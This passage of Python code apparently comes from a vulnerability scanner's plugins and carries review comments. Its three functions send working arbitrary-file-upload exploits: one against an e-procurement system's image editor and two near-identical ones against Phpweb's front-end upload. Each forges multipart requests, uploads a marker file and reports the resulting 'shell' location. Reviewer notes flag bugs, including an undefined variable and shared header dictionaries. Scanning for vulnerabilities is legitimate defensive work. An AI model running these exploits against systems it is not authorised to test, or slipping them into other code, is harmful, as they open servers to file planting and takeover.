    (case-insensitive) is reported. Exceptions go to ErrorHandling/ErrorLog.

    Args:
        Url: target URL; split into scheme/host/port by UrlProcessing.
        RandomAgent: value used for the User-Agent header.
        proxies: proxy spec, resolved by ClassCongregation.Proxies.
        **kwargs: forwarded to VulnerabilityDetails.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    # NOTE(review): sibling plugins call ClassCongregation.UrlProcessing().result(Url);
    # confirm this bare name is imported in this module, otherwise NameError is raised.
    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when the URL carries none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as-is
    try:
        RD = ClassCongregation.randoms().result(20)
        payload = "/library/editornew/Editor/img_save.asp"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        # NOTE(review): this multipart body is shown here on a single line; the original
        # source presumably had line breaks between the parts — verify against the repository.
        data = ''' ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_src"; filename="123.cer" Content-Type: application/x-x509-ca-cert {} ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="Submit" 提交 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_alt" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_align" baseline ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_border" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="newid" 45 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_hspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_vspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA-- '''.format(RD)
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False)
        con = resp.text
        match = re.search(r'getimg\(\'([\d]+.cer)\'\)', con)
        if match:
            payload_url2 = scheme + "://" + url + ":" + str( port) + "/library/editornew/Editor/NewImage/" + match.group(1)
            # NOTE(review): `s` is never assigned in this function; unless it is a module
            # global, this line raises NameError, which the except below turns into an
            # error-log entry and the check never reports.
            resp2 = s.get(payload_url2, headers=headers, timeout=6, proxies=proxies, verify=False)
            con2 = resp2.text
            code2 = resp2.status_code
            # The uploaded content is only the random marker RD, used to confirm the write.
            if code2 == 200 and con2.lower().find(RD) != -1:
                Medusa = "{}存在一采通电子采购系统任意文件上传漏洞\r\n 验证数据:\r\nshell地址:{}\r\n内容:{}\r\n".format( url, payload_url2, con2)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # pass the url and the scan result
                ClassCongregation.WriteFile().result( str(url), str(Medusa)) # write to file: url is the target used as the file name, Medusa is the result
    except Exception as e:
        # Broad catch: every failure is logged, none propagates to the caller.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # NOTE(review): unlike most sibling plugins, the exception object is not written to
        # the error log here, only the URL and plugin name.
        _l = ClassCongregation.ErrorLog().Write(url, _) # call the log-writing class with the URL and the failing plugin name
def medusa(**kwargs) -> None:
    """Check for an unauthenticated upload in Phpweb's front end.

    Three requests: POST ``act=appcode`` to ``/base/post.php`` and pull a
    ``k=`` token from the reply; POST a hand-built multipart body with a
    random marker and ``md5(k + "1")`` to ``/base/appfile.php``; then GET
    ``/effect/source/bg/<marker>.txt`` and report a finding when it is 200
    and contains the marker. Exceptions go to ErrorHandling/ErrorLog. The
    uploaded file is not removed afterwards.

    Keyword Args:
        Url: base URL the payload paths are appended to.
        Headers: request headers; mutated in place (see note below).
        Proxies: proxy spec passed straight to requests.
    """
    url = kwargs.get("Url") # fetch the Url argument
    Headers = kwargs.get("Headers") # fetch the request headers
    proxies = kwargs.get("Proxies") # fetch the proxies argument
    try:
        payload1 = "/base/post.php"
        payload_url1 = url + payload1
        dada = "act=appcode"
        payload2 = "/base/appfile.php"
        payload_url2 = url + payload2
        ran = ClassCongregation.randoms().result(10)
        payload_url3 = url + "/effect/source/bg/{}.txt".format(ran)
        # NOTE(review): these are aliases, not copies — Headers, Headers1 and Headers2 are
        # the same dict object, so the Content-Type assigned via Headers2 below is also
        # what the first POST (sent with Headers1) carries, and the caller's dict changes.
        Headers1 = Headers
        Headers2 = Headers
        Headers1['Accept'] = '*/*'
        Headers1['Content-Type'] = 'application/x-www-form-urlencoded'
        Headers2['Accept'] = '*/*'
        Headers2[ 'Content-Type'] = 'multipart/form-data; boundary=----WebKitFormBoundary0ZoOKoVwkSlGFfVE'
        resp = requests.post(payload_url1, data=dada, proxies=proxies, headers=Headers1, timeout=5, verify=False)
        con = resp.text
        # re.match returns None when the body does not start with "k=...&"; .group(1) then
        # raises AttributeError, which the except below logs.
        k = re.match('k=(.*?)&', con, re.M | re.I).group(1) # extract the value of k
        md5_en = hashlib.md5((k + "1").encode("utf-8")).hexdigest()
        # NOTE(review): this multipart body is shown here on a single line; the original
        # source presumably had line breaks between the parts — verify against the repository.
        dada2 = '''------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="file"; filename="{}.txt" Content-Type: application/octet-stream {} ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="t" 1 ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="m" {} ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="act" upload ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="r_size" 10 ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="submit" getshell ------WebKitFormBoundary0ZoOKoVwkSlGFfVE--'''.format(ran, ran, md5_en)
        resp2 = requests.post(payload_url2, data=dada2, proxies=proxies, headers=Headers2, timeout=5, verify=False)  # upload response is not inspected
        resp3 = requests.get(payload_url3, headers=Headers1, proxies=proxies, timeout=5, verify=False)
        code3 = resp3.status_code
        con3 = resp3.text
        if code3 == 200 and con3.find(ran) != -1:
            Medusa = "{} 存在Phpweb前台任意文件上传漏洞\r\n漏洞地址:\r\n上传位置:\r\n{}\r\n上传数据包:\r\n{}\r\nwebshell位置:\r\n{}\r\n漏洞详情:\r\n{}".format( url, payload_url2, dada2, payload_url3, con3)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails( _t.info, resp3, **kwargs).Write() # pass the url and the scan result
            ClassCongregation.WriteFile().result( str(url), str(Medusa)) # write to file: url is the target used as the file name, Medusa is the result
    except Exception as e:
        # Broad catch: every failure is logged, none propagates to the caller.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) # call the log-writing class; return value is unused
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check for an unauthenticated upload in Phpweb's front end.

    Builds two header dicts around *RandomAgent* (form-encoded and
    multipart), then: POST ``act=appcode`` to ``/base/post.php`` and pull a
    ``k=`` token from the reply; POST a hand-built multipart body with a
    random marker and ``md5(k + "1")`` to ``/base/appfile.php``; GET
    ``/effect/source/bg/<marker>.txt`` and report a finding when it is 200
    and contains the marker. Exceptions go to ErrorHandling/ErrorLog. The
    uploaded file is not removed afterwards.

    Args:
        Url: target URL; split into scheme/host/port by UrlProcessing.
        RandomAgent: value used for the User-Agent header.
        proxies: proxy spec, resolved by ClassCongregation.Proxies.
        **kwargs: forwarded to VulnerabilityDetails.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    # NOTE(review): sibling plugins call ClassCongregation.UrlProcessing().result(Url);
    # confirm this bare name is imported in this module, otherwise NameError is raised.
    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when the URL carries none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as-is
    try:
        payload1 = "/base/post.php"
        payload_url1 = scheme + '://' + url + ':' + str(port) + payload1
        dada = "act=appcode"
        payload2 = "/base/appfile.php"
        payload_url2 = scheme + '://' + url + ':' + str(port) + payload2
        ran = ClassCongregation.randoms().result(10)
        payload_url3 = scheme + '://' + url + ':' + str( port) + "/effect/source/bg/{}.txt".format(ran)
        # Separate dict objects here, unlike the kwargs-based variant of this plugin.
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
        }
        headers2 = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary0ZoOKoVwkSlGFfVE',
        }
        resp = requests.post(payload_url1, data=dada, proxies=proxies, headers=headers, timeout=5, verify=False)
        con = resp.text
        # re.match returns None when the body does not start with "k=...&"; .group(1) then
        # raises AttributeError, which the except below logs.
        k = re.match('k=(.*?)&', con, re.M | re.I).group(1) # extract the value of k
        md5_en = hashlib.md5((k + "1").encode("utf-8")).hexdigest()
        # NOTE(review): this multipart body is shown here on a single line; the original
        # source presumably had line breaks between the parts — verify against the repository.
        dada2 = '''------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="file"; filename="{}.txt" Content-Type: application/octet-stream {} ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="t" 1 ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="m" {} ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="act" upload ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="r_size" 10 ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="submit" getshell ------WebKitFormBoundary0ZoOKoVwkSlGFfVE--'''.format(ran, ran, md5_en)
        resp2 = requests.post(payload_url2, data=dada2, proxies=proxies, headers=headers2, timeout=5, verify=False)  # upload response is not inspected
        resp3 = requests.get(payload_url3, headers=headers, proxies=proxies, timeout=5, verify=False)
        code3 = resp3.status_code
        con3 = resp3.text
        if code3 == 200 and con3.find(ran) != -1:
            Medusa = "{} 存在Phpweb前台任意文件上传漏洞\r\n漏洞地址:\r\n上传位置:\r\n{}\r\n上传数据包:\r\n{}\r\nwebshell位置:\r\n{}\r\n漏洞详情:\r\n{}".format( url, payload_url2, dada2, payload_url3, con3)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # pass the url and the scan result
            ClassCongregation.WriteFile().result( str(url), str(Medusa)) # write to file: url is the target used as the file name, Medusa is the result
    except Exception as e:
        # Broad catch: every failure is logged, none propagates to the caller.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) # call the log-writing class; return value is unused